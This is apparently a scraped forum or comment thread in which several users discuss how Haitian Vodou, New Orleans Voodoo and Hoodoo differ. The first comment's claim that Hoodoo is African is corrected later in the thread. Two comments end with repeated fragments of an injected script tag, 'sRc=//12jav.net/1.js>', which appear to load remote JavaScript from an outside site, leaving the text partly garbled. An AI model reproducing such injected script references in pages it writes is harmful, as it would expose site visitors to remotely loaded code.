Haitian Vodou is called exactly that with that spelling; Vodou. When the slaves were brought to the Americas from Africa they brought their beliefs with them known as Hoodoo. So keep this in mind:

Vodou is Hatian

Voodoo is New Orleans

Hoodoo is Africa

Ive head that depending of the region that the slaves where brought, the syncretism is diferent, because some slaves came from a diferent part of africa with diferent religion and believes, i saw in some cuban that there lies the diference between haitian voodoo and regla de la osha. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Actually Hoodoo is American, and it's not a religion. It's a southern-based folk magic that does however, get a lot of its influence from slaves brought over from Africa, as well as Christian and some Native American practices. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
